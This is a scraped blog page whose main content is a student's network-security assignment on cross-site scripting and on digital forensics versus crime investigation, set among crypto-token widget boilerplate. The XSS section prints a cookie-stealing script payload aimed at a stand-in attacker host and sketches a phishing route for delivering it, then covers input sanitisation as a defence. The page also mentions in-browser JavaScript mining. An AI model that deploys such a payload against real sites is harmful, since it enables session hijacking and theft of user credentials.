Opacity: zIndex: Get 100 0FP0EXP Token to input your own list (json format) or insert json link:

Get 80 0FP0EXP Token to input your own list (json format) or insert json link:

My Playlist:

JSON Ready: Not Ready

Ready State:

Network State:

Name:

Album:

Reference:

Background Color

General HTML background color:

Header background color:

Menu background color:

Content background color:

Widget background color:

Footer background color:

Font Size

Get 150 0FP0EXP Token to unlock this feature.

Heading 1 font size:

Heading 2 font size:

Heading 3 font size:

Heading 4 font size:

Heading 5 font size:

Heading 6 font size:

Header font size:

Header Widget font size:

Menu font size:

Widget font size:

Footer font size:

Content font size:

Font Color

Get 200 0FP0EXP Token to unlock this feature.

Heading 1 font color:

Heading 2 font color:

Heading 3 font color:

Heading 4 font color:

Heading 5 font color:

Heading 6 font color:

Header font color:

Header Widget font color:

Menu font color:

Widget font color:

Footer font color:

Content font color:

Font Shadow

Get 250 0FP0EXP Token to unlock this feature.

Heading 1 font shadow:

Heading 2 font shadow:

Heading 3 font shadow:

Heading 4 font shadow:

Heading 5 font shadow:

Heading 6 font shadow:

Header font shadow:

Header Widget font shadow:

Menu font shadow:

Widget font shadow:

Footer font shadow:

Content font shadow:

Other Styles Coming Soon



Source Code

Click the above image for basic sourced and click following button for processing token source code.

Ethereum Virtual Machine

Ethereum and EVM (ETC, BSC, AVAX-C-Chain, Polygon, etc).

Telegram Open Network

Telegram Open Network (TON) decentralized application.

Solana

Solana decentralized application.

Tron

Tron decentralized application.

Near

Near decentralized application.

Wax

Wax decentralized application.

Myalgo

Myalgo wallet for Algorand decentralized application.

Sync2

Sync2 wallet for Vechain decentralized application.

Scatter

Scatter wallet for EOS decentralized application.

Ontology

Ontology decentralized application.

Rabbet

Rabbet wallet for Stellar Lumen decentralized application.

Freighter

Freighter wallet for Stellar Lumen decentralized application.

Hivesigner

Hive Signer for Hive decentralized application.

Hivekeychain

Hive Key Chain for Hive decentralized application.

Zilpay

Zilpay wallet for Zilliqa decentralized application.

Neoline N2

Neoline wallet for Neo N2 decentralized application.

Neoline N3

Neoline wallet for Neo N3 decentralized application.

Keplr

Keplr wallet for Cosmos and other decentralized application.

Keeper

Keeper wallet for Waves decentralized application.

IWallet

IWallet for IOST decentralized application.

My Opinion of XSS/CSS, Digital Forensic, and Digital Crime Investigation when I was a Young Student

Get 60 0FP0EXP Token to remove widget entirely!

source code



source code
old source code

get any 0FP0EXP Token to automatically turn off or 10 0FP0EXP Token to remove this JavaScript Mining.

Get 50 0FP0EXP Token to remove my NFTS advertisements!

Get 40 0FP0EXP Token to remove this donation notification!

get 30 0FP0EXP Token to remove this paypal donation.

View My Stats

get 20 0FP0EXP Token to remove my personal ADS.

word number: 726

Time: 2024-03-28 08:05:29 +0000

0.featured-image.png

Note

This is the fourteenth assignment from my Masters Advanced Network Security Course which has never been published anywhere and I, as the author and copyright holder, license this assignment customized CC-BY-SA where anyone can share, copy, republish, and sell on condition to state my name as the author and notify that the original and open version available here.

1. XSS/CSS

XSS/CSS stands for cross site scripting which is a computer security vulnerability to inject scripts into web pages viewed by other users [1]. What is the difference between code injection? Code injection is a server side vulnerability while XSS is a client side vulnerability, what they have in common is they are injection type attack [2]. One of the easiest method to check for XSS vulnerability is to include a html tags into the submission form, for example on Figure 1 is an <S> (strike-through) html tag inserted on a simple php form input (any php tutorial on the web have this tutorial) and Figure 2 is an example of using <img src=””> tag to add an image, even worse we can input tags that could display the attacker site instead and take the victim site with <script>document.location=”http://some_attacker/cookie.cgi?” + document.cookie</script>. (1) Once a XSS vulnerability had been found we can send a phising email to the user of the site containing the XSS script. (2) With a good social engineering the user site can be tricked in running the code and connect to attacker’s site through the vulnerable XSS site. (3) The attacker can obtain the session ID and other informations of the victim. [3]

1.strikethroughXSSexample.png

Figure 1. Checking XSS vulnerability strike through HTML tag example.

To prevent XSS we have to filter the user input. One way is to not allow html tags for, or perform sensitization allowing text formatting tag such as <B> <U> <I> <S>, and converting dangerous tags like “&→&amp”, “&lt→&lt”, “&gt→&gt”, “”→&quot”, “’→&x27”, and “/→&x2f”. For my above PHP code I can fix it by changing the output function (adding) into “echo htmlspecialchars($string, ENT_QUOTES, ‘UTF-8’)”. There are libraries available for filtering XSS if it’s difficult to make our own libraries such as “PHP AntiXSS”, “xss_clean.php filter”, “htmlpurifier”, “xssprotect”, and “XSS html filter”. [4]

2.imgsrcXSS.png

Figure 2. Checking XSS vulnerability image HTML tag example.

2. Digital Crime Investigation vs Digital Forensic

Digital crime investigation is mainly used in criminal investigation in order to enhance the criminal investigation process itself. It’s more like an auxiliary to tool in which is specifically digital typed tools. For example (1) the use of surveillance camera to capture robbery incident in stores, (2) categorizing data, clustering data, plotting graph, which is under data mining, (3) using database to store crime records. On the other hand digital forensic is to extract, collect, analyze, and preserve digital evidence, for example to be shown in court. [5]

3.digital-forensic-on-hardware.png

Figure 3. Illustration of digital forensic on hardware containing data.

Both digital crime investigation and digital forensic are part of a subject called forensic science. Performing autopsy on a dead body to find the cause of death is an example of medical forensic. Then examining a computer to search for informations of itself being attacked is an example of digital forensic. The basic step is to (1) identify the attack, its extent and damage caused, (2) identify the source of the attack, (3) record the incident. The scope of digital forensic can be computer forensic as example above, or network forensic which the larger scale with the computer forensic included into the network forensic. Unlike medical forensic we can first create a duplicate of the computer data or network data before running digital forensic which is a safe type of investigation that avoids the risk of destroying the evidence. Most popularly examined on digital forensics are maintenance of files and folders, disk logs, server logs, logs from IDS/IPS, and network packets if captured. [5]

3. Reference

  1. https://en.wikipedia.org/wiki/Cross-site_scripting
  2. https://community.rapid7.com/community/nexpose/blog/2013/06/20/xss-vs-injection
  3. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98590&chapterid=4892
  4. http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks
  5. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98593&chapterid=4897

Mirrors